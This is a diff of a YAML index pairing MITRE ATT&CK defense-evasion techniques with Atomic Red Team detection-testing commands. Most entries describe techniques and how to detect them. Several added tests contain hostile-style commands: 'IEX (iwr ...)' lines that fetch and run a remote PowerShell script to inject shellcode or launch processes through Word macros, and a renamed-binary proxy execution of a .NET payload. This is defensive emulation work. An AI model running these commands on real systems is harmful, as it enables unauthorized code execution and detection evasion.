+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Patch System Image
+ description: "Adversaries may modify the operating system of a network device
+ to introduce new capabilities or weaken existing defenses.(Citation: Killing
+ the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation:
+ Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation:
+ Juniper Netscreen of the Dead) Some network devices are built with a monolithic
+ architecture, where the entire operating system and most of the functionality
+ of the device is contained within a single file. Adversaries may change this
+ file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo
+ change the operating system in storage, the adversary will typically use the
+ standard procedures available to device operators. This may involve downloading
+ a new file via typical protocols used on network devices, such as TFTP, FTP,
+ SCP, or a console connection. The original file may be overwritten, or a
+ new file may be written alongside of it and the device reconfigured to boot
+ to the compromised image.\n\nTo change the operating system in memory, the
+ adversary typically can use one of two methods. In the first, the adversary
+ would make use of native debug commands in the original, unaltered running
+ operating system that allow them to directly modify the relevant memory addresses
+ containing the running operating system. This method typically requires administrative
+ level access to the device.\n\nIn the second method for changing the operating
+ system in memory, the adversary would make use of the boot loader. The boot
+ loader is the first piece of software that loads when the device starts that,
+ in turn, will launch the operating system. Adversaries may use malicious
+ code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004)
+ method, to directly manipulate running operating system code in memory. This
+ malicious code in the bootloader provides the capability of direct memory
+ manipulation to the adversary, allowing them to patch the live operating system
+ during runtime.\n\nBy modifying the instructions stored in the system image
+ file, adversaries may either weaken existing defenses or provision new capabilities
+ that the device did not have before. Examples of existing defenses that can
+ be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600),
+ authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004),
+ and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).
+ \ Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001),
+ [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port
+ Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may
+ also compromise existing commands in the operating system to produce false
+ output to mislead defenders. When this method is used in conjunction with
+ [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one
+ example of a compromised system command may include changing the output of
+ the command that shows the version of the currently running operating system.
+ \ By patching the operating system, the adversary can change this command
+ to instead display the original, higher revision number that they replaced
+ through the system downgrade. \n\nWhen the operating system is patched in
+ storage, this can be achieved in either the resident storage (typically a
+ form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).
+ \n\nWhen the technique is performed on the running operating system in memory
+ and not on the stored copy, this technique will not survive across reboots.
+ \ However, live memory modification of the operating system can be combined
+ with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve
+ persistence. "
+ id: attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-22T17:50:46.560Z'
+ created: '2020-10-19T19:49:24.129Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
+
+ Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device configuration
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1574.007:
technique:
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ created: '2020-03-13T14:10:43.424Z'
+ modified: '2020-09-16T16:56:34.583Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.007
+ url: https://attack.mitre.org/techniques/T1574/007
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - external_id: CAPEC-38
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/38.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by PATH Environment Variable
description: |-
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- name: Path Interception by PATH Environment Variable
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1574.007
- url: https://attack.mitre.org/techniques/T1574/007
- - external_id: CAPEC-capec
- source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-06-20T22:02:40.983Z'
- created: '2020-03-13T14:10:43.424Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ x_mitre_defense_bypassed:
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Application control
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.008:
technique:
- created: '2020-03-13T17:48:58.999Z'
- modified: '2020-03-26T20:03:27.496Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -31480,9 +35662,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.008
url: https://attack.mitre.org/techniques/T1574/008
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-159
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/159.html
- url: http://msdn.microsoft.com/en-us/library/ms682425
description: Microsoft. (n.d.). CreateProcess function. Retrieved December
5, 2014.
@@ -31498,6 +35680,16 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:03:35.217Z'
+ created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -31522,23 +35714,13 @@ defense-evasion:
atomic_tests: []
T1574.009:
technique:
- created: '2020-03-13T13:51:58.519Z'
- modified: '2020-03-26T19:55:39.867Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
url: https://attack.mitre.org/techniques/T1574/009
- - external_id: CAPEC-capec
+ - external_id: CAPEC-38
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/38.html
- source_name: Microsoft CurrentControlSet Services
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services
@@ -31566,7 +35748,17 @@ defense-evasion:
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- x_mitre_version: '1.0'
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-17T19:05:23.755Z'
+ created: '2020-03-13T13:51:58.519Z'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -31701,9 +35893,9 @@ defense-evasion:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:23:25.002Z'
+ modified: '2020-10-21T01:26:31.804Z'
created: '2020-07-01T18:23:25.002Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -31716,6 +35908,7 @@ defense-evasion:
- Linux
- macOS
- Windows
+ - Network
atomic_tests: []
T1055.002:
technique:
@@ -31808,11 +36001,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-05-19T21:22:38.174Z'
+ modified: '2020-10-22T16:35:54.740Z'
created: '2019-11-13T14:44:49.439Z'
x_mitre_platforms:
- Linux
- Windows
+ - Network
x_mitre_data_sources:
- VBR
- MBR
@@ -31829,7 +36023,7 @@ defense-evasion:
- Anti-virus
- Host intrusion prevention systems
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
@@ -32112,6 +36306,39 @@ defense-evasion:
'
name: powershell
+ - name: RunPE via VBA
+ auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
+ description: 'This module executes calc.exe from within the WINWORD.EXE process
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
+ -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
+ name: powershell
T1055:
technique:
id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
@@ -32249,6 +36476,37 @@ defense-evasion:
mavinject $mypid /INJECTRUNNING #{dll_payload}
name: powershell
elevation_required: true
+ - name: Shellcode execution via VBA
+ auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
+ description: |
+ This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+ with Metasploit, for use on x86-64 Windows 10 machines.
+
+ Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+ is required.
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The 64-bit version of Microsoft Office must be installed
+
+'
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+ name: powershell
T1055.008:
technique:
external_references:
@@ -32394,6 +36652,98 @@ defense-evasion:
'
name: command_prompt
+ T1542.004:
+ technique:
+ created: '2020-10-20T00:05:48.790Z'
+ modified: '2020-10-22T02:18:19.568Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc
+ description: |-
+ Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
+
+
+ ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.
+ name: ROMMONkit
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.004
+ url: https://attack.mitre.org/techniques/T1542/004
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: There are no documented means for defenders to validate the
+ operation of the ROMMON outside of vendor support. If a network device is
+ suspected of being compromised, contact the vendor to assist in further investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_data_sources:
+ - File monitoring
+ - Netflow/Enclave netflow
+ - Network protocol analysis
+ - Packet capture
+ atomic_tests: []
+ T1600.001:
+ technique:
+ id: attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8
+ description: |-
+ Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
+
+ Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.
+
+ Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)
+ name: Reduce Key Space
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1600.001
+ url: https://attack.mitre.org/techniques/T1600/001
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T22:36:22.369Z'
+ created: '2020-10-19T19:03:48.310Z'
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ x_mitre_detection: There is no documented method for defenders to directly identify
+ behaviors that reduce encryption key space. Detection efforts may be focused
+ on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some
+ detection methods require vendor support to aid in investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1108:
technique:
object_marking_refs:
@@ -33983,9 +38333,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.010
url: https://attack.mitre.org/techniques/T1574/010
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-17
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/17.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -34003,7 +38353,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:37:28.912Z'
+ modified: '2020-09-16T19:10:04.262Z'
created: '2020-03-12T20:43:53.998Z'
x_mitre_contributors:
- Travis Smith, Tripwire
@@ -34038,9 +38388,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.011
url: https://attack.mitre.org/techniques/T1574/011
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-478
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/478.html
- source_name: Registry Key Security
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN
description: Microsoft. (2018, May 31). Registry Key Security and Access Rights.
@@ -34091,7 +38441,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:01:09.906Z'
+ modified: '2020-09-16T19:07:48.590Z'
created: '2020-03-13T11:42:14.444Z'
x_mitre_defense_bypassed:
- Application control
@@ -34320,7 +38670,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:39:02.045Z'
+ modified: '2020-10-21T18:37:15.275Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -34501,6 +38851,69 @@ defense-evasion:
command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
'
+ - name: Microsoft.Workflow.Compiler.exe Payload Execution
+ auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
+ description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
+ .Net assembly that launches calc.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ xml_payload:
+ description: XML to execution
+ type: path
+ default: PathToAtomicsFolder\T1218\src\T1218.xml
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net must be installed for this test to work correctly.\n"
+ prereq_command: 'if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
+ ) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'write-host ".Net must be installed for this test to work
+ correctly."
+
+'
+ executor:
+ command: |
+ Set-Location -path PathToAtomicsFolder\T1218\src ;
+ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt
+ name: powershell
+ elevation_required: false
+ - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+ auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
+ description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
+ running a .Net assembly that launches calc.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ xml_payload:
+ description: XML to execution
+ type: path
+ default: PathToAtomicsFolder\T1218\src\T1218.xml
+ renamed_binary:
+ description: renamed Microsoft.Workflow.Compiler
+ type: path
+ default: PathToAtomicsFolder\T1218\src\svchost.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: ".Net must be installed for this test to work correctly.\n"
+ prereq_command: |
+ Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force
+ if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
+ get_prereq_command: 'write-host "you need to rename workflow complier before
+ you run this test"
+
+'
+ executor:
+ command: |
+ Set-Location -path PathToAtomicsFolder\T1218\src ;
+ #{renamed_binary} #{xml_payload} output.txt
+ name: powershell
+ elevation_required: false
T1216:
technique:
id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
@@ -34794,6 +39207,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1027.003
url: https://attack.mitre.org/techniques/T1027/003
+ - external_id: CAPEC-636
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/636.html
- url: https://en.wikipedia.org/wiki/Duqu
description: Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.
source_name: Wikipedia Duqu
@@ -34823,9 +39239,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-08T18:16:48.253Z'
+ modified: '2020-09-16T19:24:20.350Z'
created: '2020-02-05T14:28:16.719Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: Detection of steganography is difficult unless artifacts
are left behind by the obfuscation process that are detectable with a known
@@ -35250,6 +39666,70 @@ defense-evasion:
- Anti-virus
- File monitoring
atomic_tests: []
+ T1542.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1542.005
+ url: https://attack.mitre.org/techniques/T1542/005
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Secure Boot
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure
+ Boot. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Image File Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Image File Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
+ IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Command History
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command
+ History. Retrieved October 21, 2020.
+ - source_name: Cisco IOS Software Integrity Assurance - Boot Information
+ url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
+ description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
+ Information. Retrieved October 21, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: TFTP Boot
+ description: |-
+ Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
+
+ Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)
+ id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ modified: '2020-10-22T16:35:53.806Z'
+ created: '2020-10-20T00:06:56.180Z'
+ x_mitre_data_sources:
+ - Network device run-time memory
+ - Network device command history
+ - Network device configuration
+ - File monitoring
+ - Network device logs
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: |-
+ Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
+
+ Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1221:
technique:
id: attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534
@@ -35461,14 +39941,15 @@ defense-evasion:
atomic_tests: []
T1497.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Time Based Evasion
+ created: '2020-03-06T21:11:11.225Z'
+ modified: '2020-07-01T16:32:02.532Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
